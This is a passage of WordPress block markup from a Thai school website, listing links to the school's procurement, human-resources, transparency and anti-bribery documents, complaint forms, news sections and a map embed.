href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 